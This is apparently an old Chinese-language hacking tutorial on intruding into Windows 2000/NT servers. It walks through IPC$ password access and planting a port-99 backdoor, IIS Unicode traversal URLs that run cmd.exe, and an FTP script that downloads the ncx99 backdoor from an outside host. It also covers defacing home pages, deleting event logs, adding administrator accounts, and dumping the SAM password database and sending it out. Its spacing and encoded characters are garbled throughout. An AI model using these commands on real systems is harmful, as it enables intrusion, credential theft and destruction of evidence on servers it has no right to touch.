windows入侵简单讲说

Win2000入侵(1)Win2000的漏洞我知道的也就这几个在这献丑了先什么呢？？？？？就ipc$吧毕竟这个好理解什么是ipc$我就不说了,我也不大明白ipc探测大多基于139用的工具当然是流光了呵呵其实还有别的工具也可以探测,我个人认为还是流光好.怎么用流光的ipc探测帮助里写的相当相当详细了流光的帮助是我见过黑客教学最傻瓜的了大家知道探测出密码了,可以用种植者种植但是有时启动不起来那还要我们来帮助它吧呵呵netuse\\**.**.***.***\ipc$quot;密码quot;/user:quot;这个你自己猜吧quot;***是目标的位置就是ip好象这是废话呵呵copy\tools\srv.exe\\202.**.**.**\admin$\system32这个就是把srv.exe复制到肉鸡上nettime\\203.161gt;**.**这个就是查看肉鸡的时间比如说是02:22这个有可能是02:22还有可能是14:22at\\203.**.**.**TIMEsrv.exe这样就启动了srv.exe了然后就telnet203.**.**.**99(srn.exe其实就是在99端口开启个后门呵呵)上去了吧哈哈对了上去也不代表我就控制了机器呀对呀你还要成为管理员这样就方便多了呵呵命令是netuser用户/add这个是创建个用户netlocalgroupadministrators用户/add这呀就是把刚才你加的用户加到管理员权限里好了现在你是管理员了呵呵2000的一个很有用的就是做跳板netsvc\\127.0.0.1telnet/stopnetsvc\\127.0.0.1telnet/start这两个命令最好还是在肉鸡上执行好象快点好了ipc就介绍到这吧其实net命令很有用的强烈推荐大家好好看看命令详解下面呢????好就cgi吧哈哈这个好象难了点我看见不少人都问怎么用好我就给大家介绍介绍我其实也不怎么熟的呵呵这是我转来得大家好好看看我也懒一、Unicode漏洞的实现要利用unicode利用，先要知道如何实现，通常，我们通过以下几种途径来利用Unicode漏洞:--蜡..蜡..蜡..蜡../winnt/system32/cmd.exe?/cdirc:\蜡..蜡..蜡../winnt/system32/cmd.exe?/cdirc:\蜡..蜡..蜡../winnt/system32/cmd.exe?/cdirc:\蜡..蜡..蜡../winnt/system32/cmd.exe?/cdirc:\蜡..蜡..蜡../winnt/system32/cmd.exe?/cdirc:\如果浏览器返回C:的目录列表，那么就可以继续了。其中，从dir开始是真正的命令，用连接命令。（注：下面将不再把前面的地址写上，直接为命令）二、如何修改对方主页？通常，在系统盘的目录下有Inetpub目录.其中有个目录是用来存放主页空间的。先dirC:\Inetpub\察看目录：返回:======================================================DirectoryofC:\inetpub\=========================================================接着：我们就delc:\inetpub\:\inetpub\利用echo命令和重定向符号创建新文件.三、如果主页不在默认路径下，如何知道在哪里？我们可以到他的主页上，选取他的标题图片，右键点击，看它的文件名。比如：exsample.gif于是，我们用：dirc:\exsample.gif/sdird:\exsmaple.gif/s...这样可以搜索到它的标题图片，通常在主页的images目录下，那么这个目录的上级目录就是存放主页的。按照二中所讲的方法可以修改其主页。四、如何将文件上传？这个是我们最关心的了，因为一旦上传了如ncx99一样的程序，那么有些事就好办多了。偷懒的人也许上传个冰河上去：）。方法：（俗称ftp方法）echoopenftp.xxx.com（ftp主机）gt;c:\temp.1（可以随便取个名字，最好放到隐蔽的地方）echouseryournamegt;gt;c:\temp.1yourname是你的用户名echoyourpasswdgt;gt;c:\temp.1yourpasswd是你的密码echogetncx99.exegt;gt;c:\temp.1你要下载的文件echoquitgt;gt;c:\temp.1ftp/s:c:\temp.1好了，过一会儿，用dir察看当前目录，就会看见ncx99.exe，酷！接下来如何，不用说了吧！五、如何做个很大的文件？我们可以用bat文件来实现。用echo建立如下文件，注意扩展名为bat:@echooffechobiggt;x.x:wcopyx.xx.xx.xgotow这样，就会……呵呵，不用说了吧，但这个好像不好。也可以上传个程序过去。这个只不过比较方便。六、万一遇到长文件名怎么办？这是很菜鸟的问题，但确实有人不会用，我在这里简单地说一下：例如：c:\programfiles\microsoftbillgates\hackermanandwoman.txt如何表示？用：c:\quot;program20%filesquot;\quot;microsoft20%billgatesquot;\hackermanandwoman.txt七、如何删除脚印(日志)？用如下命令：delC:\winnt\system32\logfiles\*.*delC:\winnt\ssytem32\config\*.evtdelC:\winnt\system32\dtclog\*.*delC:\winnt\system32\*.logdelC:\winnt\system32\*.txtdelC:\winnt\*.txtdelC:\winnt\*.log八、如何创建新的用户名，并将用户名加入Administrator组？这个不一定会成功，由于你没有足够的权限。除非碰到一些傻瓜网站。我们可以用echo创建一个bat文件。包含一下命令：netuserMynameMyPasswd/add/expires:nevernetlocalgroupquot;administratorsquot;/addMyname然后，执行这个bat，就可以了。记得把它删除哦！九、如何获得SAM数据库？先用上传文件的方法上传samdump，然后用它把sam库拷贝到别的地方（直接下载SAM库是不行的）。比如samdumpC:\winnt\system32\config\samC:\temp.aaa然后在把temp.aaa上传到你的ftp服务器上，也可以把它拷贝到主页目录下，用浏览器下载。本篇文章允许转载，但请注明由eastdark所著呵呵上面说的其实很简单的http://*****.***gt;***/msadc/..蜡..蜡..蜡../winnt/system32/cmd.exe?/cdirc:\这个就是最经典的unicode漏洞了最主要是能用命令呵呵/winnt/system32/cmd.exe?/c这个后面就是用命令的地方比如要看system32文件夹的内容就是/winnt/system32/cmd.exe?/cdirc:\winnt\system32还有别的命令呵呵../winnt/system32/cmd.exe?/ccopyc:\winnt\repair\sam._c:\inetpub\这个就是把sam复制到里了启动它就是winnt/system32/cmd.exe?/cC:\Inetpub\scripts\srv.exe既然启动你还塄着干什么telnet呀呵呵还是99端口呀我再给大家介绍一篇最近这些日子好多的WINNT的服务器被黑，尤其是国内的。下面是一些具体示例的总结。下面这类型的漏洞以发现近一年多了，一年多前在国外的黑客网站就有了类似的文章，但是当时并没有很多人重视。,在反北约的黑客战中有很多就是用下面这些例子了。不过直到UNICOUDE漏洞的发现，黑NT的计算机变的傻瓜化了。下面我把最近的一些文章总结一下。希望大家能从这里体会到点什么。（下面的文章来自一些邮件列表和BBS）原理：(其实原来都很相似，我拿这个做个例子。)NSFOCUS安全小组发现IIS4.0和IIS5.0在Unicode字符解码的实现中存在一个安全漏洞，导致用户可以远程通过IIS执行任意命令。当IIS打开文件时，如果该文件名包含unicode字符，它会对其进行解码，如果用户提供一些特殊的编码，将导致IIS错误的打开或者执行某些web根目录以外的文件。对于IIS5.0/4.0中文版，当IIS收到的URL请求的文件名中包含一个特殊的编码例如quot;?hhquot;或者quot;?hhquot;,它会首先将其解码变成:0xc10xhh，然后尝试打开这个文件，Windows系统认为0xc10xhh可能是unicode编码，因此它会首先将其解码，如果0x00lt;=%hhlt;0x40的话，采用的解码的格式与下面的格式类似：?hh-gt;(0xc1-0xc0)*0x400xhh?hh-gt;(0xc0-0xc0)*0x400xhh因此，利用这种编码，我们可以构造很多字符，例如:?-gt;(0xc1-0xc0)*0x400x1c=0x5c='/'?-gt;(0xc0-0xc0)*0x400x2f=0x2f='\'攻击者可以利用这个漏洞来绕过IIS的路径检查，去执行或者打开任意的文件。(1)如果系统包含某个可执行目录，就可能执行任意系统命令。下面的URL可能列出当前目录的内容：(2)利用这个漏洞查看系统文件内容也是可能的：@WIRETRIP.NETgt;测试发现对于英文版的IIS4.0/5.0,此问题同样存在，只是编码格式略有不同，变成quot;蜡quot;或者quot;翜quot;.下面我们的例子以?为主讲解。注:号可以用代替,依这种格式你还可以构造出许多命令好多站点\inetpub\下的scripts目录删除了，但\ProgramFiles\CommonFiles\System\下的msadc还在（有msadcs.dll漏洞的话就不用?了）。这时可以如下构造请求：:\实践一：（修改主页----最简单化的一种）很多入侵都以修改主页的形式表现出来，这通常有两种情况：一是表达自己的愤慨--比如当年以美国为首的北约悍然轰炸我驻南使馆的突发事件之后，国内很多